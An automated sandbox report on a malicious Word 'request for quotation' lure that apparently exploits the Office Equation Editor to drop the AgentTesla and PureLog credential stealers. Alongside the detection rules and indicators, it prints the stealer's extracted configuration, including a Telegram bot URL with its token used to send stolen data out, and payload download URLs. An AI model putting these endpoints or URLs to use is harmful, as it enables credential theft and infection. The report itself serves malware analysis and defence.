Edit tour

Windows Analysis Report
REQUEST FOR QUOTATION.docx.doc

Overview

General Information

Sample name:	REQUEST FOR QUOTATION.docx.doc
Analysis ID:	1436756
MD5:	d03e818c9b5e10f20be12369b980dcf4
SHA1:	1b06f7e8918e40fe1fee605fdeb8fa008098b34d
SHA256:	93c86de90e7a282f6999b7233cbb1b815bbdb8f1f103481b6f8ac0def74f88fe
Tags:	doc
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Contains an external reference to another file

Contains functionality to log keystrokes (.Net Source)

Document exploit detected (process start blacklist hit)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Microsoft Office drops suspicious files

Office drops RTF file

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: Suspicious Office Outbound Connections

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1516 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3148 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

html.exe (PID: 3220 cmdline: "C:\Users\user\AppData\Roaming\html.exe" MD5: 4C8B56B125AE41293AA6028204D44268)

html.exe (PID: 3296 cmdline: "C:\Users\user\AppData\Roaming\html.exe" MD5: 4C8B56B125AE41293AA6028204D44268)

AcroRd32.exe (PID: 3652 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)

RdrCEF.exe (PID: 3824 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)

mpTrle.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe" MD5: 4C8B56B125AE41293AA6028204D44268)

mpTrle.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe" MD5: 4C8B56B125AE41293AA6028204D44268)

mpTrle.exe (PID: 3780 cmdline: "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe" MD5: 4C8B56B125AE41293AA6028204D44268)

mpTrle.exe (PID: 4088 cmdline: "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe" MD5: 4C8B56B125AE41293AA6028204D44268)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/sendMessage?chat_id=6410945890"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0xc84:$obj2: \objdata 0xc70:$obj3: \objupdate 0xc4c:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0xc84:$obj2: \objdata 0xc70:$obj3: \objupdate 0xc4c:$obj6: \objlink

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.398826908.00000000004F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.656194441.0000000002407000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.399016918.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.455352786.0000000002340000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.421607400.0000000002151000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.421607400.00000000024A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.656186717.00000000028D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.399016918.0000000002881000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: html.exe PID: 3220	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: html.exe PID: 3220	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: html.exe PID: 3220	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: html.exe PID: 3296	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: html.exe PID: 3296	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: mpTrle.exe PID: 3532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mpTrle.exe PID: 3532	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: mpTrle.exe PID: 3532	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: mpTrle.exe PID: 4088	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mpTrle.exe PID: 4088	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.html.exe.28cf3d0.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.html.exe.4f0000.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.html.exe.4f0000.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.mpTrle.exe.251d10c.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.mpTrle.exe.251e124.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.html.exe.2c4d040.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.html.exe.2c13268.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.html.exe.3b1a710.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.html.exe.3b1a710.10.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.html.exe.3b1a710.10.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.html.exe.3b1a710.10.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31a7b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31aed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31b77:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31c09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31c73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31ce5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31d7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31e0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.mpTrle.exe.219f414.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.html.exe.3b55730.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.html.exe.3b55730.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.html.exe.3b55730.9.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.html.exe.3b55730.9.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31a7b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31aed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31b77:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31c09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31c73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31ce5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31d7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31e0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.mpTrle.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.mpTrle.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.mpTrle.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.mpTrle.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3387b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x338ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.html.exe.2c4e058.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.mpTrle.exe.219f414.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.html.exe.28cf3d0.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.mpTrle.exe.24e3334.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.html.exe.3b55730.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.html.exe.3b55730.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.html.exe.3b55730.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.html.exe.3b55730.9.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.html.exe.3b55730.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3387b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e69b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x338ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e70d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e797:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e829:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e893:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e905:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e99b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6ea2b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.html.exe.3b1a710.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.html.exe.3b1a710.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.html.exe.3b1a710.10.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.html.exe.3b1a710.10.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.html.exe.3b1a710.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3387b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e89b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa96bb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x338ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e90d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa972d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e997:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa97b7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6ea29:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa9849:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6ea93:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa98b3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6eb05:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa9925:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6eb9b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa99bb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Click to see the 29 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 104.168.33.34, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49172, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 104.168.33.34, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\html.exe" , CommandLine: "C:\Users\user\AppData\Roaming\html.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\html.exe, NewProcessName: C:\Users\user\AppData\Roaming\html.exe, OriginalFileName: C:\Users\user\AppData\Roaming\html.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3148, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\html.exe" , ProcessId: 3220, ProcessName: html.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\html.exe" , CommandLine: "C:\Users\user\AppData\Roaming\html.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\html.exe, NewProcessName: C:\Users\user\AppData\Roaming\html.exe, OriginalFileName: C:\Users\user\AppData\Roaming\html.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3148, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\html.exe" , ProcessId: 3220, ProcessName: html.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\html.exe, ProcessId: 3296, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mpTrle

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\html.exe, QueryName: api.ipify.org

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 1516, Protocol: tcp, SourceIp: 109.71.253.25, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1516, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1516, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Avira: detection malicious, Label: HEUR/AGEN.1305639
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Roaming\html.exe	Avira: detection malicious, Label: HEUR/AGEN.1305639
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1305639
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Found malware configuration

Source: 12.2.mpTrle.exe.400000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/sendMessage?chat_id=6410945890"}
Source: html.exe.3220.9.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/sendMessage"}

Multi AV Scanner detection for domain / URL

Source: wbze.de	Virustotal: Detection: 10%	Perma Link
Source: https://wbze.de/u7xc	Virustotal: Detection: 9%	Perma Link
Source: http://wbze.de/u7xc	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe	Virustotal: Detection: 36%	Perma Link
Source: C:\Users\user\AppData\Roaming\html.exe	Virustotal: Detection: 36%	Perma Link
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Virustotal: Detection: 36%	Perma Link

Multi AV Scanner detection for submitted file

Source: REQUEST FOR QUOTATION.docx.doc

Virustotal: Detection: 9%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\html.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.168.33.34 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\html.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\html.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown	HTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49166 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49174 version: TLS 1.2

Source:	Binary string: lGeIZ.pdbSHA256) source: EQNEDT32.EXE, 00000008.00000003.379830677.000000000A7E1000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr
Source:	Binary string: lGeIZ.pdb source: EQNEDT32.EXE, 00000008.00000003.379830677.000000000A7E1000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Directory queried: number of queries: 1006

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

